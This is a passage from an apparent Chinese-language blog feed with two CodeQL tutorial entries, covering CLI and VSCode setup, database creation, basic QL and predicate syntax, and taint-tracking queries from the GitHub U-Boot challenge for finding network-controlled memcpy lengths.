class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">EnvironmentToFileConfiguration</span> extends DataFlow::Configuration &#123;</span><br><span class="line">  <span class="built_in">EnvironmentToFileConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;EnvironmentToFileConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    <span class="built_in">exists</span> (Function getenv |</span><br><span class="line">      source.<span class="built_in">asExpr</span>().(FunctionCall).<span class="built_in">getTarget</span>() = getenv <span class="keyword">and</span></span><br><span class="line">      getenv.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;getenv&quot;</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    <span class="built_in">exists</span> (FunctionCall fc |</span><br><span class="line">      sink.<span class="built_in">asExpr</span>() = fc.<span class="built_in">getArgument</span>(<span class="number">0</span>) <span class="keyword">and</span></span><br><span class="line">      fc.<span class="built_in">getTarget</span>().<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from Expr getenv, Expr fopen, EnvironmentToFileConfiguration config</span><br><span class="line">where config.<span class="built_in">hasFlow</span>(DataFlow::<span class="built_in">exprNode</span>(getenv), DataFlow::<span class="built_in">exprNode</span>(fopen))</span><br><span class="line">select fopen, <span class="string">&quot;This &#x27;fopen&#x27; uses data from $@.&quot;</span>,</span><br><span class="line">  getenv, <span class="string">&quot;call to &#x27;getenv&#x27;&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>以下污点追踪代码用于追踪从调用<code>ntohl</code>到操作数组索引的数据流。该代码使用<code>Guards</code>库以识别经过边界检查的表达式，同时还定义了谓词<code>isSanitizer</code>以避免污点分析经过特定数据，最后定义了<code>isAdditionalTaintStep</code>用于将流从边界循环添加至循环索引。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.controlflow.Guards</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkToBufferSizeConfiguration</span> extends TaintTracking::Configuration &#123;</span><br><span class="line">  <span class="built_in">NetworkToBufferSizeConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;NetworkToBufferSizeConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node node) &#123;</span><br><span class="line">    node.<span class="built_in">asExpr</span>().(FunctionCall).<span class="built_in">getTarget</span>().<span class="built_in">hasGlobalName</span>(<span class="string">&quot;ntohl&quot;</span>)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node node) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(ArrayExpr ae | node.<span class="built_in">asExpr</span>() = ae.<span class="built_in">getArrayOffset</span>())</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isAdditionalTaintStep</span>(DataFlow::Node pred, DataFlow::Node succ) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(Loop loop, LoopCounter lc |</span><br><span class="line">      loop = lc.<span class="built_in">getALoop</span>() <span class="keyword">and</span></span><br><span class="line">      loop.<span class="built_in">getControllingExpr</span>().(RelationalOperation).<span class="built_in">getGreaterOperand</span>() = pred.<span class="built_in">asExpr</span>() |</span><br><span class="line">      succ.<span class="built_in">asExpr</span>() = lc.<span class="built_in">getVariableAccessInLoop</span>(loop)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSanitizer</span>(DataFlow::Node node) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(GuardCondition gc, Variable v |</span><br><span class="line">      gc.getAChild*() = v.<span class="built_in">getAnAccess</span>() <span class="keyword">and</span></span><br><span class="line">      node.<span class="built_in">asExpr</span>() = v.<span class="built_in">getAnAccess</span>() <span class="keyword">and</span></span><br><span class="line">      gc.<span class="built_in">controls</span>(node.<span class="built_in">asExpr</span>().<span class="built_in">getBasicBlock</span>(), _)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from DataFlow::Node ntohl, DataFlow::Node offset, NetworkToBufferSizeConfiguration conf</span><br><span class="line">where conf.<span class="built_in">hasFlow</span>(ntohl, offset)</span><br><span class="line">select offset, <span class="string">&quot;This array offset may be influenced by $@.&quot;</span>, ntohl,</span><br><span class="line">  <span class="string">&quot;converted data from the network&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h2 id="七、CodeQL-U-Boot-Challenge">七、CodeQL U-Boot Challenge</h2><ul><li><p>纸上得来终觉浅，绝知此事要躬行。简单翻阅QL文档是学不到什么的，我们需要自己动手实践一下。</p><p>下面笔者将讲述github learning lab中，用于学习CodeQL的一个入门课程 - <a href="https://lab.github.com/GitHubtraining/codeql-u-boot-challenge-(cc++)">CodeQL U-Boot Challenge (C/C++)</a></p></li><li><p>Step1: 了解从何处获取帮助</p><ul><li><a href="https://lgtm.com/help/lgtm/console/ql-cpp-basic-example">Writing a basic C++ Code QL query</a></li><li><a href="https://help.semmle.com/QL/learn-ql/introduction-to-ql.html">Introduction to CodeQL</a></li><li><a href="https://help.semmle.com/QL/learn-ql/">Learning CodeQL</a></li></ul></li><li><p>Step2: 设置IDE</p><ul><li>下载VSCode以及CodeQL插件，还有CodeQL CLI文件。</li><li>下载<a href="https://github.com/github/vscode-codeql-starter/">CodeQL starter</a>工作区</li><li>下载<a href="https://downloads.lgtm.com/snapshots/cpp/uboot/u-boot_u-boot_cpp-srcVersion_d0d07ba86afc8074d79e436b1ba4478fa0f0c1b5-dist_odasa-2019-07-25-linux64.zip">U-Boot CodeQL database</a>并解压</li><li>克隆<a href="https://github.com/Kiprey/codeql-uboot">当前github课程仓库</a></li><li>将当前课程仓库的文件夹添加至之前下载的VScode starter工作区，同时将之前下载的U-Boot数据库导入至VScode</li><li>一切就绪!</li></ul></li><li><p>Step3: 编写一个简单的查询。在这里我们用于查询<code>strlen</code>函数的定义位置。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;strlen&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function named strlen&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step4: 分析这个简单的查询，之后查询一下<code>memcpy</code>函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function named memcpy&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step5: 使用不同的类以及不同的谓语。这里我们编写QL查找名为<code>ntohs</code>、<code>ntohl</code>以及<code>ntohll</code>的宏定义。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp </span><br><span class="line"></span><br><span class="line">from Macro macro</span><br><span class="line"><span class="comment">//where macro.getName() = &quot;ntohs&quot; or macro.getName() = &quot;ntohl&quot; or macro.getName() = &quot;ntohll&quot;</span></span><br><span class="line">where macro.<span class="built_in">getName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select macro</span><br></pre></td></tr></table></figure></li><li><p>Step6: 使用双变量。通过使用多个变量来描述复杂的代码关系，查询特定函数的调用位置。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from FunctionCall c, Function f</span><br><span class="line">where c.<span class="built_in">getTarget</span>() = f <span class="keyword">and</span> f.<span class="built_in">getName</span>() == <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select c</span><br></pre></td></tr></table></figure></li><li><p>Step7:  使用Step6的技巧，查询宏定义的调用位置。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from MacroInvocation invoc</span><br><span class="line">where invoc.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select invoc</span><br></pre></td></tr></table></figure></li><li><p>Step8: 改变select的输出。查找这些宏调用所扩展到的顶级表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from MacroInvocation mi</span><br><span class="line">where mi.<span class="built_in">getMacro</span>().<span class="built_in">getName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select mi.<span class="built_in">getExpr</span>() <span class="comment">// 注意这里的.getExpr()</span></span><br></pre></td></tr></table></figure></li><li><p>Step9：编写一个类。用<code>exists</code>关键字来引入一个临时变量，以设置当前类的数据集合；特征谓词在声明时会被调用以确定当前类的范围，类似于C++构造函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from NetworkByteSwap n</span><br><span class="line">select n, <span class="string">&quot;Network byte swap&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step10：数据流分析。若<code>memcpy</code>中<code>length</code>直接来自于远程，而不加以验证，那么这将会产生OOB漏洞。以下编写的CodeQL查询针对的就是这类情况，它将使用全局数据流分析技术，查出真正的CVE漏洞。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"><span class="keyword">import</span> DataFlow::PathGraph</span><br><span class="line"></span><br><span class="line"><span class="comment">// 设置用于交换网络数据的类</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()    &#123;</span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 设置污点跟踪的分析信息</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Config</span> extends TaintTracking::Configuration&#123;</span><br><span class="line">    <span class="built_in">Config</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;NetworkToMemFuncLength&quot;</span>&#125;</span><br><span class="line">    <span class="comment">// 覆盖原先的isSource. 该谓语用于表示满足控制流源头的表达式.</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source)&#123;</span><br><span class="line">        source.<span class="built_in">asExpr</span>() instanceof NetworkByteSwap</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 覆盖原先的isSink, 该谓语用于表示满足控制流尽头的表达式.</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink)&#123;</span><br><span class="line">        <span class="built_in">exists</span>(FunctionCall c | c.<span class="built_in">getTarget</span>().<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span> <span class="keyword">and</span> sink.<span class="built_in">asExpr</span>() = c.<span class="built_in">getArgument</span>(<span class="number">2</span>))</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 查询</span></span><br><span class="line">from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink</span><br><span class="line">where cfg.<span class="built_in">hasFlowPath</span>(source, sink)</span><br><span class="line">select sink, source, sink, <span class="string">&quot;Network byte swap flows to mmcpy&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h2 id="八、结语">八、结语</h2><ul><li>当我们深入学习Codeql之后，我们就可以使用CodeQL挖掘特定漏洞模式的漏洞。</li><li>CodeQL入门大致如上所示，更深层次的使用需要翻阅各种QL API来结合使用，<a href="https://help.semmle.com/QL/learn-ql/cpp/introduce-libraries-cpp.html">CodeQL library for C and C++</a> 由此进。</li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;CodeQL 是一个语义代码分析引擎，它可以扫描发现代码库中的漏洞。使用 CodeQL，可以像对待数据一样查询代码。编写查询条件以查找漏洞的所有变体并处理，同时可以分享个人查询条件。&lt;/p&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="CodeQL" scheme="https://kiprey.github.io/tags/CodeQL/"/>
    
  </entry>
  
  <entry>
    <title>CodeQL初入</title>
    <link href="https://kiprey.github.io/2020/12/CodeQL-setup/"/>
    <id>https://kiprey.github.io/2020/12/CodeQL-setup/</id>
    <published>2020-12-06T07:24:31.000Z</published>
    <updated>2025-11-24T03:59:39.783Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>CodeQL 是一个语义代码分析引擎，它可以扫描发现代码库中的漏洞。使用 CodeQL，可以像对待数据一样查询代码。编写查询条件以查找漏洞的所有变体并处理，同时可以分享个人查询条件。</p><span id="more"></span><p>编写该文章时，主要参考了官方文档 - <a href="https://help.semmle.com/QL/ql-handbook/index.html#">QL language reference</a></p><h2 id="二、环境搭建">二、环境搭建</h2><blockquote><p>环境搭建整体参考 <a href="https://paper.seebug.org/1078/">代码分析引擎 CodeQL 初体验</a></p></blockquote><ul><li><p>首先，下载一下<code>CodeQL CLI</code>二进制文件并安装</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 下载codeql.zip</span></span><br><span class="line">wget https://github.com/github/codeql-cli-binaries/releases/latest/download/codeql.zip</span><br><span class="line"><span class="comment"># 解压</span></span><br><span class="line">unzip codeql.zip</span><br><span class="line"><span class="comment"># 将codeql添加至path中</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;export PATH=\$PATH:/usr/class/codeql&quot;</span> &gt;&gt; ~/.zshrc</span><br><span class="line"><span class="built_in">source</span> ~/.zshrc</span><br></pre></td></tr></table></figure></li><li><p>由于是入门，我们只需要使用初始工作区（starter workspace）就好，因此执行以下命令</p><blockquote><p>工作区配置参考——<a href="https://help.semmle.com/codeql/codeql-for-vscode/procedures/setting-up.html#using-the-starter-workspace">Using the starter workspace</a></p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> --recursive git@github.com:github/vscode-codeql-starter.git</span><br></pre></td></tr></table></figure><blockquote><p>注意：该工作区内含了QL库，因此一定要使用递归方式来下拉工作区代码。</p><p>递归方式下拉该仓库后，我们不需要再下拉<code>https://github.com/Semmle/ql</code>这个库了。</p></blockquote><p>如果觉得下拉很慢，可以挂个代理</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 设置代理</span></span><br><span class="line">git config --global http.proxy &lt;Protocol&gt;://&lt;IP&gt;:&lt;PORT&gt;</span><br><span class="line"><span class="comment"># 取消代理</span></span><br><span class="line">git config --global --<span class="built_in">unset</span> http.proxy</span><br></pre></td></tr></table></figure></li><li><p>最后，我们还需要在VScode中下载CodeQL的插件——<a href="https://marketplace.visualstudio.com/items?itemName=GitHub.vscode-codeql">Visual Studio Code Marketplace</a>。</p><p>插件下载完成后，还需要在vscode中设置一下<code>Code QL -- Cli: Executable Path</code>为刚刚下载下来的<code>codeql</code>二进制文件执行路径。</p></li><li><p>上述操作完成后，我们需要先建立一个AST数据库，后续的查询操作等都是在该数据库中完成。</p><p>以C++代码为例，我们可以使用如下命令来建立一个数据库</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">codeql database create &lt;database-folder&gt; --language=cpp --<span class="built_in">command</span>=&lt;prefix <span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure><blockquote><p>如果省略<code>--command</code>参数，则codeQL会自动检测并使用自己的工具来构建。</p><p>但还是强烈推荐使用自己自定义的参数，尤其是大项目时。</p></blockquote><p>以构建chrome为例，由于chrome项目过于庞大，因此我们只能针对某个模块来进行分析。</p><p>于是我们可以进行如下操作</p><ul><li><p>先完整编译一个chromium，release不带符号即可。</p></li><li><p>进入obj目录，将目标模块的obj删除。</p></li><li><p>执行以下命令，重新编译该模块并构建数据库即可。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gn gen out/ql &amp;&amp; codeql database create &lt;targetFolder&gt; --language=cpp --Command=<span class="string">&#x27; ninja -C out/ql chrome&#x27;</span></span><br></pre></td></tr></table></figure></li></ul><p>建立好的数据库，其目录结构为</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">- log\                # 输出的日志信息</span><br><span class="line">- db-cpp\             # 编译的数据库</span><br><span class="line">- src.zip             # 编译所对应的目标源码</span><br><span class="line">- codeql-database.yml # 数据库相关配置</span><br></pre></td></tr></table></figure></li><li><p>之后在VSCode中，</p><ul><li>点击“打开工作区”来打开刚刚下拉的<code>vscode-codeql-starter</code>工作区</li><li>在CodeQL插件里，打开刚刚生成的database</li><li>之后编写自己的CodeQL脚本，并将脚本保存至<code>vscode-codeql-starter\codeql-custom-queries-cpp</code>处，这样import模块时就可以正常引用。</li><li>将编写的ql脚本在VSCode中打开，之后点击CodeQL插件中的<code>Run on queue</code>，即可开始查询。</li></ul></li><li><p>如果想查看某个文件的AST，直接对目标源码，点击右键—<code>CodeQL: View AST</code>即可。第一次执行时会比较慢，稍微等待十分钟左右即可。</p></li></ul><blockquote><p>CodeQL使用操作参考 - <a href="https://help.semmle.com/codeql/codeql-for-vscode/procedures/using-extension.html">CodeQL分析项目</a></p></blockquote><h2 id="三、基本语法">三、基本语法</h2><blockquote><p>基础语法将结合ql代码来讲解。</p></blockquote><ul><li><p>该QL将输出所有基础块中的空基础块。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 首先是引入QL库中的一个包</span></span><br><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="comment">// 限定范围在所有的BlockStmt，即所有的基础块</span></span><br><span class="line">from BlockStmt b</span><br><span class="line"><span class="comment">// 获取在当前基础块中，语句个数为0的基础块（即空基础块）</span></span><br><span class="line">where b.<span class="built_in">getNumStmt</span>() = <span class="number">0</span></span><br><span class="line"><span class="comment">// 输出搜索到的空基础块，与其后面的字符串</span></span><br><span class="line">select b, <span class="string">&quot;This is an empty block.&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>以下是获取某个宏定义位置的ql代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Macro m</span><br><span class="line">where m.<span class="built_in">getName</span>() = <span class="string">&quot;_LIBCPP_NO_CFI&quot;</span></span><br><span class="line">  <span class="keyword">or</span> m.<span class="built_in">getName</span>() = <span class="string">&quot;_GLIBC_LIKELY&quot;</span></span><br><span class="line">select m,<span class="string">&quot;macro&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>该代码获取调用特定函数的代码位置</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function named memcpy&quot;</span></span><br></pre></td></tr></table></figure><p>这并不稀奇，但关键是下一个ql代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from FunctionCall call, Function func</span><br><span class="line">where</span><br><span class="line">    call.<span class="built_in">getTarget</span>() = func <span class="keyword">and</span></span><br><span class="line">    func.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select call,<span class="string">&quot;func named memcpy and called&quot;</span></span><br></pre></td></tr></table></figure><p><code>FunctionCall</code>将会涵盖所有的函数调用，因此我们可以通过该对象来获取特定函数被调用的位置。</p></li></ul><blockquote><p>对于所有的类和函数，都可以通过ctrl+右键的形式来查看其源码来了解更多信息。</p></blockquote><h2 id="四、高级语法">四、高级语法</h2><h3 id="1-谓词">1. 谓词</h3><h4 id="a-概述">a. 概述</h4><ul><li><p>在CodeQL中，函数并不叫“函数”，叫做<code>Predicates</code>（谓词）。为了便于说明，下文中笔者可能会混用<strong>函数</strong>这个词语，即下文中的 <strong>“函数”</strong> 与 <strong>“谓语”</strong> 都是指代同一个内容。</p></li><li><p>在使用谓词前，我们需要定义一个谓词。谓词的格式如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">predicate <span class="title">name</span><span class="params">(type arg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  statements</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>定义谓词有三个步骤</p><ul><li>关键词predicate（如果没有返回值），或者结果的类型（如果当前谓词内存在返回值）</li><li>谓词的名称</li><li>谓词的参数列表</li><li>谓词主体</li></ul></li></ul><h4 id="b-无返回值的谓词">b. 无返回值的谓词</h4><ul><li><p>无返回值的谓词以<code>predicate</code>关键词开头。若传入的值满足谓词主体中的逻辑，则该谓词将保留该值。</p></li><li><p>无返回值谓词的使用范围较小，但仍然在某些情况下扮演了很重要的一个角色，具体功能将在下文中逐渐讲解。</p></li><li><p>需要注意的是，参数<code>i</code>是一个<strong>数据集合</strong></p></li><li><p>举一个简单的例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">predicate <span class="title">isSmall</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  i in [<span class="number">1</span> .. <span class="number">9</span>]</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">from <span class="type">int</span> i </span></span><br><span class="line"><span class="function">where <span class="title">isSmall</span><span class="params">(i)</span> <span class="comment">// 将整数集合i从正无穷大的数据集含，限制至1-9</span></span></span><br><span class="line"><span class="function">select i</span></span><br><span class="line"><span class="function"><span class="comment">// 输出 1-9的数字</span></span></span><br></pre></td></tr></table></figure><p>若传入的<code>i</code>是小于10的正整数，则<code>isSmall(i)</code>将会使得传入的集合<code>i</code>只保留符合条件的值，其他值将会被舍弃。</p></li></ul><h4 id="c-带返回值的谓词">c. 带返回值的谓词</h4><ul><li><p>当我们需要将某些结果从谓词中返回时，与C/C++的return语句不同的是，谓词使用的是一个特殊变量<code>result</code>。</p></li><li><p>举个简单例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">getSuccessor</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// 若传入的i位于1-9内，则返回i+1</span></span><br><span class="line">  <span class="comment">// 注意这个语法不能用C++语法来理解</span></span><br><span class="line">  result = i + <span class="number">1</span> <span class="keyword">and</span> i in [<span class="number">1</span> .. <span class="number">9</span>]</span><br><span class="line">&#125;</span><br><span class="line">  </span><br><span class="line">select <span class="built_in">getSuccessor</span>(<span class="number">3</span>)  <span class="comment">// 输出4</span></span><br><span 